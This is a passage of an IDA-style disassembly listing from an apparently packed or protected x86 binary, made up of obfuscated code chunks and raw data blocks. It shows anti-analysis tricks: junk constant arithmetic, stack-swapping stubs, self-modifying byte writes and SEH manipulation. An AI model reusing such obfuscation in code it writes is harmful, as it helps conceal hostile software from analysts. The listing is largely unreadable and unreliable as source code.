; END OF FUNCTION CHUNK	FOR sub_48A195
; ---------------------------------------------------------------------------
		dw 0
		dd 5F243C87h, 0CCF3B850h, 66E90048h, 0FFFFC1h, 5A241487h
		dd 840FD209h, 0FFFFD704h, 0C293E950h
		db 2 dup(0FFh),	0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48A195

loc_48DEC7:				; CODE XREF: sub_48A195+264Aj
		push	offset loc_48BC00
		jmp	loc_48A143
; END OF FUNCTION CHUNK	FOR sub_48A195
; ---------------------------------------------------------------------------
		align 2
		dw 850Fh
		dd 0FFFFD9C9h, 6EEFA81h, 61E9BD4Ch, 81FFFFDBh, 0DE04B4C1h
		dd 0F7FDE904h, 0A4E9FFFFh, 0FFFFFF1h, 0FFF2DE89h, 28890FFFh
		dd 57FFFFDFh, 0C890B850h, 0CEE90048h, 0FFFFD8h
		db 0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48A195

loc_48DF0D:				; CODE XREF: sub_48A195+37j
		xchg	ebx, [esp-0Ch+arg_8]
		mov	ecx, ebx
		pop	ebx
		xor	eax, eax
		retn
; END OF FUNCTION CHUNK	FOR sub_48A195
; ---------------------------------------------------------------------------
		align 4
		dd 0FFCF1AE9h, 0E90000FFh, 79Ah
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48A195

loc_48DF24:				; CODE XREF: sub_48A195:loc_48AB21j
		pop	large dword ptr	fs:0
		jmp	loc_48AF9E
; END OF FUNCTION CHUNK	FOR sub_48A195
; ---------------------------------------------------------------------------
		db 0, 0C3h
word_48DF32	dw 0D068h		; DATA XREF: sub_48D127+5o
		dd 58C52E8Dh, 5780E081h, 0C8E99F6Fh, 87FFFFEEh,	875E2434h
		dd 0AFE92404h, 0FFFFD0h, 48DEEE68h, 0E612E900h,	0FFFFh
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48E23D

loc_48DF5C:				; CODE XREF: sub_48E23D+5E4j
		mov	byte ptr [ecx],	8Bh
		pop	ecx
		push	0B7196426h
		pop	edi
		jmp	loc_48E55E
; END OF FUNCTION CHUNK	FOR sub_48E23D
; ---------------------------------------------------------------------------
		align 4

loc_48DF6C:				; CODE XREF: ss.cste0:004898B6j
		or	esi, 878A7E07h
		xor	esi, 74F0FB94h
		add	esi, 753D9DFCh
		jmp	loc_48CF6F
; ---------------------------------------------------------------------------
		align 4
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_565. PRESS KEYPAD	"+" TO EXPAND]
		align 2
		retn
; ---------------------------------------------------------------------------
		align 4
		db 0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48A195

loc_48DF89:				; CODE XREF: sub_48A195+C8j
		mov	byte ptr [esi],	87h
		pop	esi
		pop	esi
		push	ebx
		mov	ebx, offset loc_48C76D
		jmp	loc_48CECF
; END OF FUNCTION CHUNK	FOR sub_48A195
; ---------------------------------------------------------------------------
		db 0Fh,	8Ch, 59h
		dd 0E9FFFFE4h, 0FFFFF0C2h
		db 2 dup(0)
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_534. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48D886

loc_48DFA7:				; CODE XREF: sub_48D886-C55j
		jmp	near ptr dword_48A0AC+47h
; END OF FUNCTION CHUNK	FOR sub_48D886
; ---------------------------------------------------------------------------
		db 2 dup(0)
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_580. PRESS KEYPAD	"+" TO EXPAND]
		db 99h
		dd 68AA9DE0h, 48E7DAh, 9E9h, 840F0000h,	0FFFFC3AFh, 0EDE90000h
		dd 0E9000000h, 0C1Ch, 9DEB1300h, 80E38156h, 0E9E33F6Ah
		dd 0FFFFC391h
		db 2 dup(0)
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48A195

loc_48DFE2:				; CODE XREF: sub_48A195:loc_48D439j
		call	loc_48A21C
		add	[edx+0Fh], bl
		test	[ebp-20h], bh
; END OF FUNCTION CHUNK	FOR sub_48A195
; ---------------------------------------------------------------------------
		db 2 dup(0FFh),	0E9h
		dd 0FFFFFCF3h
; ---------------------------------------------------------------------------

loc_48DFF4:				; DATA XREF: sub_48A195:loc_48B8C7o
		mov	byte ptr [ecx],	0FFh

loc_48DFF7:				; CODE XREF: ss.cste0:0048BEE0j
		pop	ecx
		push	edx
		push	5CA92A99h
		pop	edx
		or	edx, 80835621h
		jmp	loc_48C0B2
; ---------------------------------------------------------------------------
		db 0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48A195

loc_48E00B:				; CODE XREF: sub_48A195:loc_48D15Cj
		mov	byte ptr [ecx],	9Ch
		pop	ecx
		call	loc_48B200
; END OF FUNCTION CHUNK	FOR sub_48A195
; ---------------------------------------------------------------------------
		db 2 dup(0)

; =============== S U B	R O U T	I N E =======================================



sub_48E016	proc near		; CODE XREF: ss.cste0:0048D06Dp

; FUNCTION CHUNK AT 0048D9B2 SIZE 00000014 BYTES

		xchg	eax, [esp+0]
		pop	eax
		push	4477D5CFh
		pop	edi
		rol	edi, 0Dh
		sub	edi, 78F35B65h
		jmp	loc_48D9B2
sub_48E016	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		align 10h
dword_48E030	dd 1AE93B89h, 0FFFFDBh,	0A4C68100h, 0E9A3FBA9h,	64h, 0FFD94BE9h
		dd 0DD840FFFh, 68FFFFD8h, 48B0F6h
; ---------------------------------------------------------------------------

loc_48E054:				; CODE XREF: ss.cste0:0048D1C2j
		jmp	nullsub_561
; ---------------------------------------------------------------------------
		db 2 dup(0)
; ---------------------------------------------------------------------------

loc_48E05B:				; CODE XREF: ss.cste0:0048DD52j
		or	ebx, 3DD2B714h
		xor	ebx, 1CC69CA8h
		add	ebx, ebp
		call	sub_48E272
		add	cl, al
		out	dx, eax
		movntps	xmm6, xmm0
; START	OF FUNCTION CHUNK FOR sub_48A195

loc_48E074:				; CODE XREF: sub_48A195:loc_48B9F7j
		push	edi
		mov	edi, offset dword_48E130
		jmp	near ptr dword_48AC18+1
; END OF FUNCTION CHUNK	FOR sub_48A195
; ---------------------------------------------------------------------------
		align 10h
		dd 68128B00h, 48E700h, 0AA7E9h
		db 3 dup(0)
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_556. PRESS KEYPAD	"+" TO EXPAND]
		dd 0C306C600h, 44C9815Eh, 810B0914h, 1987B2F9h,	0F21FE99Dh
		dd 0FFFFh, 87243487h, 0F18B240Ch, 0EF3FE959h
		db 2 dup(0FFh)
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_586. PRESS KEYPAD	"+" TO EXPAND]
		align 4
		retn
; ---------------------------------------------------------------------------
		align 2
		dw 0F38Bh
		dd 5700945Bh, 48980168h, 0F55FE900h
		db 2 dup(0FFh)
; ---------------------------------------------------------------------------

loc_48E0CA:				; CODE XREF: ss.cste0:0048C008j
		add	ecx, 4D2D250Ch
		jmp	loc_48DCF6
; ---------------------------------------------------------------------------
		db 0Fh,	84h, 0BBh
		dd 57000006h, 48BBEF68h, 0B989E900h, 0C600FFFFh, 4878706h
		dd 58F08B24h, 4E6C18Bh,	4A058D24h, 0E90048E3h, 0FFFFF90Fh
		dd 9C068900h, 84F820Fh,	819C0000h, 7392A6C2h, 68D503E1h
		dd 48EC12h, 0FFD010E9h,	396856FFh, 5E050BC9h, 0C922EE81h
		dd 0F6816B5Fh, 99AC0067h
dword_48E130	dd 0F5EC6A8h, 0FFFDBA84h, 0C6CEE9FFh, 0C300FFFFh
					; DATA XREF: sub_48A195+3EE0o
		db 2 dup(0)
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48A195

loc_48E142:				; CODE XREF: sub_48A195+1560j
		jmp	loc_48C8E0
; END OF FUNCTION CHUNK	FOR sub_48A195
; ---------------------------------------------------------------------------
		sub	ebp, 491E4866h
		jmp	loc_48E1B3
; ---------------------------------------------------------------------------
		align 4
		xchg	edx, [esp]
		pop	edx
		call	ds:dword_45D0C0	; ExitProcess
		push	0FFFFFFFFh
		jmp	loc_48D162
; ---------------------------------------------------------------------------
		align 2
; START	OF FUNCTION CHUNK FOR sub_48A195

loc_48E166:				; CODE XREF: sub_48A195+3A0Dj
		jz	loc_48DD9D
		sub	esi, eax
		mov	ecx, ebp
		or	eax, 0C19450EEh
		xor	eax, 0B3338E0Ah
		jmp	loc_48C750
; END OF FUNCTION CHUNK	FOR sub_48A195
; ---------------------------------------------------------------------------
		align 2

loc_48E182:				; CODE XREF: ss.cste0:0048CFEFj
		sbb	edi, 0FB55F8EDh
		sbb	edx, 0B9F3FA83h
		adc	ebp, 7FAAA753h
; START	OF FUNCTION CHUNK FOR sub_48A195

loc_48E194:				; CODE XREF: sub_48A195:loc_48CFE4j
		sub	edx, 106D1C9Dh
		add	edx, 3C26E832h
		xor	edx, 2BEF0B39h
		add	edx, ebp
		push	offset sub_48C11D

loc_48E1AD:				; CODE XREF: ss.cste0:0048E26Cj
		jmp	loc_48D898
; END OF FUNCTION CHUNK	FOR sub_48A195
; ---------------------------------------------------------------------------
		db 0
; ---------------------------------------------------------------------------

loc_48E1B3:				; CODE XREF: ss.cste0:0048E14Dj
		push	ebp
		xchg	esi, [esp]
		pop	esi
		push	edx
		push	8BF34F76h
		pop	edx
		and	edx, 701CD3A3h
		rol	edx, 17h
		jmp	near ptr dword_48BE90+22h
; ---------------------------------------------------------------------------
		db 56h,	0E9h, 9Bh
		db 0E7h, 2 dup(0FFh)
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_551. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
		popf
		jmp	sub_489F18
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_579. PRESS KEYPAD	"+" TO EXPAND]
		align 4
		dd 0FFEEF1E9h
		db 0FFh
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48A195

loc_48E1E1:				; CODE XREF: sub_48A195+1767j
		call	sub_48E621
; END OF FUNCTION CHUNK	FOR sub_48A195
; ---------------------------------------------------------------------------
		db 0
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_527. PRESS KEYPAD	"+" TO EXPAND]
		db 2 dup(0)
; ---------------------------------------------------------------------------

loc_48E1EA:				; CODE XREF: ss.cste0:0048CE77j
		jmp	locret_48B938
; ---------------------------------------------------------------------------
		align 10h
		db 0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48E94F

loc_48E1F1:				; CODE XREF: sub_48E94F+1Aj
		add	ecx, 21434508h
		push	48E687h
		jmp	loc_48E4E0
; END OF FUNCTION CHUNK	FOR sub_48E94F
; ---------------------------------------------------------------------------
		db 0E8h, 48h, 0E7h
		dd 0FFFFh, 6EA6FE81h, 1CE98B92h, 23FFFFB9h, 0F9BAE9F1h
		db 2 dup(0FFh),	0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48A195

loc_48E21B:				; CODE XREF: sub_48A195:loc_48BD8Fj
		push	esi
		pushf
		push	6E7C1BA2h
		pop	esi
		rol	esi, 14h
		jmp	loc_48D564
; END OF FUNCTION CHUNK	FOR sub_48A195
; ---------------------------------------------------------------------------
		db 0Fh
		db 8Dh,	36h
		dw 0FFC1h
		dd 0BC3FE9FFh, 8100FFFFh, 9B39EF7h
; ---------------------------------------------------------------------------
		inc	esi

; =============== S U B	R O U T	I N E =======================================



sub_48E23D	proc near		; CODE XREF: sub_48A195+2614p

; FUNCTION CHUNK AT 0048D391 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0048DF5C SIZE 0000000F BYTES
; FUNCTION CHUNK AT 0048E55E SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0048E805 SIZE 00000021 BYTES

		xchg	ebx, [esp+0]
		pop	ebx
		push	ecx
		push	0BFC75848h
		jmp	loc_48D391
sub_48E23D	endp ; sp-analysis failed

; ---------------------------------------------------------------------------

loc_48E24C:				; CODE XREF: ss.cste0:loc_48C63Fj
		jl	loc_48C431
		add	cl, ch		; CODE XREF: ss.cste0:0048EA5Fj
		mov	[ecx], ecx
; ---------------------------------------------------------------------------
		dw 0
; ---------------------------------------------------------------------------
		or	edi, ebp
; START	OF FUNCTION CHUNK FOR sub_48A195

loc_48E25A:				; CODE XREF: sub_48A195+17C2j
		xchg	edi, ebp
		jmp	loc_48C429
; END OF FUNCTION CHUNK	FOR sub_48A195
; ---------------------------------------------------------------------------
		align 2
; START	OF FUNCTION CHUNK FOR sub_48D886

loc_48E262:				; CODE XREF: sub_48D886+Bj
		ror	eax, 1Ah
		jmp	loc_48C464
; END OF FUNCTION CHUNK	FOR sub_48D886
; ---------------------------------------------------------------------------
		align 4
		jl	loc_48E1AD

; =============== S U B	R O U T	I N E =======================================



sub_48E272	proc near		; CODE XREF: ss.cste0:0048E069p
		xchg	ecx, [esp+0]
		pop	ecx
		add	ebx, 0DEEADBFFh
		push	48D50Bh
		jmp	locret_48D508
sub_48E272	endp

; ---------------------------------------------------------------------------
		dw 0E800h
		dd 7C5h
		db 0
; ---------------------------------------------------------------------------

loc_48E28D:				; CODE XREF: ss.cste0:loc_48D228j
		pop	eax
		retn
; ---------------------------------------------------------------------------
		align 10h
		dd 0FFB58DE9h, 680000FFh, 0BD69C392h, 0CBF08158h, 0E9719674h
		dd 359h
		db 0

; =============== S U B	R O U T	I N E =======================================



sub_48E2A9	proc near		; CODE XREF: sub_48C82C+Ap
					; ss.cste0:0048E2C7j

; FUNCTION CHUNK AT 0048CEA2 SIZE 00000005 BYTES

		xchg	eax, [esp+0]
		pop	eax
		push	esi
		push	offset dword_48B7AC
		jmp	loc_48CEA2
sub_48E2A9	endp

; ---------------------------------------------------------------------------
		dd 0FA3B0000h, 0FFF15AE9h
		db 0FFh
; ---------------------------------------------------------------------------

loc_48E2C1:				; CODE XREF: ss.cste0:0048DDB9j
		adc	edi, 5653201Fh
		jmp	sub_48E2A9
; ---------------------------------------------------------------------------
		dd 840F0000h, 0FFFFE6C2h, 7FAE9h, 85870F00h, 0E9FFFFE1h
		dd 0FFFFFBD0h
dword_48E2E4	dd 63A06852h, 0C15AC7A2h, 0F28119C2h, 0C79FEB7Bh, 5606E281h
					; DATA XREF: ss.cste0:0048BC24o
		dd 0EA819976h, 6FDC202Eh, 0FFC764E9h
		db 0FFh
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_585. PRESS KEYPAD	"+" TO EXPAND]
		align 4

; =============== S U B	R O U T	I N E =======================================



sub_48E308	proc near		; CODE XREF: ss.cste0:0048C4D1p

var_8		= dword	ptr -8

; FUNCTION CHUNK AT 0048D70C SIZE 00000020 BYTES

		xchg	eax, [esp+0]
		xchg	esi, [esp+0]
		mov	eax, esi
		pop	esi
		jmp	loc_48D70C
sub_48E308	endp ; sp-analysis failed

; ---------------------------------------------------------------------------

loc_48E316:				; CODE XREF: ss.cste0:0048BFA0j
		mov	byte ptr [ecx],	87h
		pop	ecx
		push	offset loc_48BC0C
		jmp	loc_48C6B7
; ---------------------------------------------------------------------------
		db 0

; =============== S U B	R O U T	I N E =======================================



sub_48E325	proc near		; CODE XREF: ss.cste0:0048DD87j
		xchg	eax, [esp+0]
		pop	eax
		mov	edx, [edx]
		call	loc_48A960

loc_48E330:				; CODE XREF: ss.cste0:0048EC3Bj
		jmp	loc_48AEAD
sub_48E325	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		db 2 dup(0), 0E9h
		dd 0FFFFBA43h
		db 0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48A195

loc_48E33D:				; CODE XREF: sub_48A195+1991j
		jmp	loc_48DBB5
; END OF FUNCTION CHUNK	FOR sub_48A195
; ---------------------------------------------------------------------------
		dw 0E858h
		dd 0FFFFFFDDh
		db 2 dup(0)
oword_48E34A	xmmword	0E9FD8B57FFFFF599830FFFFFC132850Fh ; DATA XREF:	sub_48E438-49EDr
		dw 0B832h
		dd 3C87FFFFh, 24348724h, 875EFE8Bh, 0FE8B2434h,	0FFE1FEE9h
		dd 9C0000FFh, 0A545F68h, 0EB815B62h, 58C2B026h,	4350C381h
		dd 36E9F701h, 0C1FFFFD3h, 0E95E11EBh, 0FFFFC037h, 0C1815B00h
		dd 66786DA8h, 0C33BE89Dh, 0B900FFFFh, 36EE2648h, 0FFC410E9h
		dd 0CA8100FFh, 76D38AA5h, 0FFC803E9h, 1C8700FFh, 56685B24h
		dd 0E90048D6h, 0FFFFEA42h

; =============== S U B	R O U T	I N E =======================================



sub_48E3C8	proc near		; CODE XREF: sub_48A195+15FBj
					; sub_48D04D-BD0p

arg_0		= dword	ptr  4

; FUNCTION CHUNK AT 0048BBB4 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0048CB5B SIZE 00000005 BYTES

		xchg	ebx, [esp-4+arg_0]
		xchg	ecx, [esp-4+arg_0]
		mov	ebx, ecx
		pop	ecx
		lea	eax, loc_48A914
		mov	[ecx+0B8h], eax
		xchg	esi, [esp+0]
		jmp	loc_48CB5B
sub_48E3C8	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		pop	eax
		rol	eax, 5
		push	48BA15h

loc_48E3EE:				; CODE XREF: ss.cste0:0048D1CCj
		jmp	loc_48B84C
; ---------------------------------------------------------------------------
		align 4

; =============== S U B	R O U T	I N E =======================================



sub_48E3F4	proc near		; CODE XREF: sub_48A195:loc_48BECDp

; FUNCTION CHUNK AT 0048BC8C SIZE 00000005 BYTES

		xchg	edx, [esp+0]
		pop	edx
		jo	near ptr dword_489788+67h
		jo	near ptr dword_48A600+6
		mov	edx, [eax]
		or	edx, edx
		jz	loc_48B5C4
		jmp	loc_48BC8C
sub_48E3F4	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		align 4
		dd 0C300h
; ---------------------------------------------------------------------------

loc_48E418:				; CODE XREF: ss.cste0:0048BFCFj
		jmp	loc_48ECDF
; ---------------------------------------------------------------------------
		db 2 dup(0), 51h
		dd 0DF3F668h, 0F1815982h, 1CA90503h, 8980F981h,	4AE9DCDAh
		dd 0FFFFE3h

; =============== S U B	R O U T	I N E =======================================



sub_48E438	proc near		; CODE XREF: sub_48A195:loc_48C99Cp

arg_0		= dword	ptr  4

; FUNCTION CHUNK AT 00489A2A SIZE 0000002A BYTES
; FUNCTION CHUNK AT 0048C191 SIZE 00000005 BYTES

		xchg	eax, [esp+0]
		pop	eax
		xchg	eax, [esp-4+arg_0]
		mov	ecx, eax
		jmp	loc_48C191
sub_48E438	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		jno	loc_48DA98
		and	ebp, ecx
		adc	ebp, 0CC5B1414h

loc_48E454:				; CODE XREF: ss.cste0:loc_48EC85j
		push	ebx
		mov	ebx, offset dword_48D820
		jmp	loc_48B553
; ---------------------------------------------------------------------------
		align 10h
		dd 1DCAC100h, 0FFF894E9h, 0BDB850FFh, 0E90048E0h, 0FFFFEE01h
		db 2 dup(0)
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_584. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48A195

loc_48E477:				; CODE XREF: sub_48A195+280Cj
		xor	edx, 0D79CF2B5h
		test	edx, 10000000h
		jmp	loc_48DDC7
; END OF FUNCTION CHUNK	FOR sub_48A195
; ---------------------------------------------------------------------------
		db 2 dup(0)
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48A195

loc_48E48A:				; CODE XREF: sub_48A195:loc_48BAA9j
		mov	eax, edx
		pop	edx
		or	eax, 4B074A7Bh
		add	eax, 13AF8BB1h
		xor	eax, 2952D758h
		add	eax, ebp
		add	eax, 547A2F00h
		jmp	loc_48BF42
; END OF FUNCTION CHUNK	FOR sub_48A195
; ---------------------------------------------------------------------------
		db 0
; ---------------------------------------------------------------------------

loc_48E4AD:				; CODE XREF: ss.cste0:0048D364j
		call	sub_48C960
; ---------------------------------------------------------------------------
		dw 0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48A195

loc_48E4B4:				; CODE XREF: sub_48A195+4602j
		jmp	near ptr dword_489F28+1Bh
; END OF FUNCTION CHUNK	FOR sub_48A195
; ---------------------------------------------------------------------------
		db 87h,	3Ch, 24h
		dd 48DA2468h, 0D8B2E900h
		db 2 dup(0FFh)
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_576. PRESS KEYPAD	"+" TO EXPAND]
		align 4
		sub	esi, eax
		jmp	loc_48A6FE
; ---------------------------------------------------------------------------
		align 10h
		dd 24048700h, 8B01C658h, 0FBCAE859h, 0FFFFh
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48E94F

loc_48E4E0:				; CODE XREF: sub_48E94F-753j
		jmp	nullsub_539
; END OF FUNCTION CHUNK	FOR sub_48E94F
; ---------------------------------------------------------------------------
		align 2

; =============== S U B	R O U T	I N E =======================================



sub_48E4E6	proc near		; CODE XREF: sub_48A195+BCEp
					; ss.cste0:0048DC6Cj

var_8		= dword	ptr -8

; FUNCTION CHUNK AT 0048EBF6 SIZE 0000001A BYTES

		xchg	ebx, [esp+0]
		call	sub_48D467

loc_48E4EE:				; CODE XREF: sub_48A195+80j
		jmp	loc_48EBF6
sub_48E4E6	endp

; ---------------------------------------------------------------------------
		db 87h
		dd 0F5B6E91Eh, 0FFFFh, 0DF9EF781h, 47E99562h
		db 0E4h, 2 dup(0FFh)
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_563. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------

loc_48E508:				; CODE XREF: ss.cste0:00489DE2j
		jmp	loc_48D8FE
; ---------------------------------------------------------------------------
		db 0Fh,	86h, 28h
		db 0CCh
		db 2 dup(0FFh),	0E9h
		dd 2D5h, 4AC08100h, 3F8AF0Dh, 0E5C081C5h, 8BE06B6Dh, 24048700h
		dd 0D67BBB53h, 0DDE90048h, 5, 1C879C00h, 0F495B24h, 0FFB31585h
		dd 0D7C3E9FFh, 0FFFFh, 1C600C3h, 75E85987h, 0FFFFB5h, 21FE9h
		db 2 dup(0)
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48E23D

loc_48E55E:				; CODE XREF: sub_48E23D-2D7j
		jmp	loc_48A2BE
; END OF FUNCTION CHUNK	FOR sub_48E23D
; ---------------------------------------------------------------------------
		align 4
		dd 58E0F00h, 68000002h,	0E9053F40h, 87243C87h, 0FD8B242Ch
		dd 0FFD9DEE9h
		db 0FFh
; ---------------------------------------------------------------------------

loc_48E57D:				; CODE XREF: ss.cste0:0048D63Bj
		push	264BA286h

loc_48E582:				; CODE XREF: sub_48A195+57Fp
		xchg	esi, [esp]
		pop	esi
		pop	edi
		call	sub_48CE1E
		add	[edi], cl
		lea	ebx, [ebp-14h]
; ---------------------------------------------------------------------------
		db 2 dup(0FFh),	0F7h
		db 0D2h

; =============== S U B	R O U T	I N E =======================================



sub_48E595	proc near		; CODE XREF: sub_48A195+1546p

arg_4		= dword	ptr  8

		xchg	edx, [esp+0]
		pop	edx
		popf
		xchg	eax, [esp-8+arg_4]
		jmp	loc_48AFFE
sub_48E595	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		dw 6800h
		dd offset dword_48E030+14h
		dd 0FFE85AE9h
; ---------------------------------------------------------------------------
		inc	dword ptr [eax]

; =============== S U B	R O U T	I N E =======================================



sub_48E5AE	proc near		; CODE XREF: sub_48A195:loc_48D006p
		xchg	ecx, [esp+0]
		pop	ecx
		push	eax
		push	0B31DE575h
		pop	eax
		and	eax, 0D9D3D91Eh
		rol	eax, 1Fh
		sub	eax, 21A35BA9h
		jmp	near ptr dword_48A3FC+4
sub_48E5AE	endp

; ---------------------------------------------------------------------------
		db 2 dup(0)

; =============== S U B	R O U T	I N E =======================================



sub_48E5CF	proc near		; CODE XREF: sub_48D04D+787p

; FUNCTION CHUNK AT 0048CA4A SIZE 00000005 BYTES

		xchg	ecx, [esp+0]
		pop	ecx
		push	edx
		mov	edx, offset loc_48CBDE
		jmp	loc_48CA4A
sub_48E5CF	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48A195

loc_48E5DE:				; CODE XREF: sub_48A195+7C5j
		call	near ptr dword_489FE4+7
		add	bl, al
		test	ebx, eax
		jmp	near ptr dword_489788+0Ch
; END OF FUNCTION CHUNK	FOR sub_48A195
; ---------------------------------------------------------------------------
		jz	loc_48E772
		jmp	loc_48BDB8
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_546. PRESS KEYPAD	"+" TO EXPAND]
		dd 7DE90B8Bh
		db 0D5h, 2 dup(0FFh)
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_560. PRESS KEYPAD	"+" TO EXPAND]
		dd 0C71DE900h, 850FFFFFh, 0FFFFB24Eh, 0B7C5840Fh, 7FE9FFFFh
		dd 0FFFFF5h, 0C133D92Bh, 0FFF293E9h
		db 0FFh

; =============== S U B	R O U T	I N E =======================================



sub_48E621	proc near		; CODE XREF: ss.cste0:0048DAE6j
					; sub_48A195:loc_48E1E1p

; FUNCTION CHUNK AT 0048DA37 SIZE 00000027 BYTES
; FUNCTION CHUNK AT 0048E7BE SIZE 0000001C BYTES

		xchg	ebx, [esp+0]
		pop	ebx
		mov	byte ptr [esi],	87h
		pop	esi
		push	0FF30DFFAh
		pop	ecx
		jmp	loc_48DA37
sub_48E621	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		dd 3107C600h, 875A565Fh, 8B552414h, 0EB04E9E9h,	6C6FFFFh
		dd 4F685E85h, 5A13F5FEh, 0F664E281h, 51E932B4h,	0FFFFC9h
; ---------------------------------------------------------------------------

loc_48E65C:				; CODE XREF: ss.cste0:0048ED42j
		jge	loc_48DD2D
; START	OF FUNCTION CHUNK FOR sub_48A195

loc_48E662:				; CODE XREF: sub_48A195+18AAj
		jmp	near ptr loc_48A1C4+1
; END OF FUNCTION CHUNK	FOR sub_48A195
; ---------------------------------------------------------------------------
		align 4
		dd 37BBC868h, 5C0C196h,	0FFF6AFE9h
; ---------------------------------------------------------------------------
		inc	dword ptr [eax]
; START	OF FUNCTION CHUNK FOR sub_48A195

loc_48E676:				; CODE XREF: sub_48A195+195Aj
		call	sub_489DC5
		add	[ecx-5E4DAC0Fh], al
		and	eax, 0FFB6C8E8h
		inc	dword ptr [edi-3A17DBF4h]
		cli
; END OF FUNCTION CHUNK	FOR sub_48A195
; ---------------------------------------------------------------------------
		db 2 dup(0FFh),	0
		db 0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48A195

loc_48E691:				; CODE XREF: sub_48A195+3BCBj
		jmp	locret_48B849
; END OF FUNCTION CHUNK	FOR sub_48A195
; ---------------------------------------------------------------------------
		align 4
		dd 0FFFBFAE9h
		db 0FFh, 2 dup(0)
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48A195

loc_48E69F:				; CODE XREF: sub_48A195+360j
		pop	esi
		and	ebx, 8959CB90h
		push	offset word_48C52E
		jmp	loc_48DA09
; END OF FUNCTION CHUNK	FOR sub_48A195
; ---------------------------------------------------------------------------
		db 2 dup(0)
; ---------------------------------------------------------------------------

loc_48E6B2:				; CODE XREF: ss.cste0:loc_48D18Fj
		push	offset dword_48DE48
		jmp	loc_48CB2C
; ---------------------------------------------------------------------------
		dd 0C6C30000h, 0C878906h, 59F18B24h, 0FFBD89E9h, 1F840FFFh
		dd 4, 0F090810Fh, 0D133FFFFh, 0CE9E823h, 4, 46F68100h
		dd 0E968B075h, 0FFFFF472h, 0D4C78100h, 230FAB1Eh, 0FD3AE9F9h
		dd 0FFFFh, 0A43C2AF6h, 5850Fh, 0E6E90000h, 87FFFFCDh, 0C88B2404h
		dd 0BD0CE958h, 0FFFFh, 0B3AAE95Ah, 0FFFFh
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_557. PRESS KEYPAD	"+" TO EXPAND]
		db 81h,	0FAh, 59h
		dd 0E952175Fh, 0FFFFEA06h
		db 0, 0C3h
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48A195

loc_48E732:				; CODE XREF: sub_48A195+374Aj
		jmp	loc_48D291
; END OF FUNCTION CHUNK	FOR sub_48A195
; ---------------------------------------------------------------------------
		db 0E9h
		dd 0FFFFDE76h, 14870000h, 0C6456824h, 0ACE90048h, 0FFFFECh
		db 0

; =============== S U B	R O U T	I N E =======================================



sub_48E74D	proc near		; CODE XREF: sub_48A195-7CEp

arg_0		= dword	ptr  4

; FUNCTION CHUNK AT 0048BD02 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0048D4F0 SIZE 00000005 BYTES

		xchg	ebx, [esp+0]
		pop	ebx
		xchg	ecx, [esp+0]
		jmp	loc_48D4F0
sub_48E74D	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
byte_48E759	db 36h,	5, 0AEh		; DATA XREF: ss.cste0:0048EC36o
		dd 450048DFh, 0E951C300h, 0FFFFB24Ch
		db 2 dup(0)
; ---------------------------------------------------------------------------

loc_48E76A:				; CODE XREF: ss.cste0:0048BDBEj
		js	loc_48D46A
		or	esi, ecx

loc_48E772:				; CODE XREF: ss.cste0:0048E5ECj
		push	offset loc_48B7F0
		jmp	locret_48B7E7
; ---------------------------------------------------------------------------
		retn
; ---------------------------------------------------------------------------
		db 2 dup(0), 87h
		dd 8EE9241Ch, 0FFFFBDh,	0BDD2E900h, 0FFFFh, 0FFB31DE9h
; ---------------------------------------------------------------------------
		inc	dword ptr [eax]
; START	OF FUNCTION CHUNK FOR sub_48A195

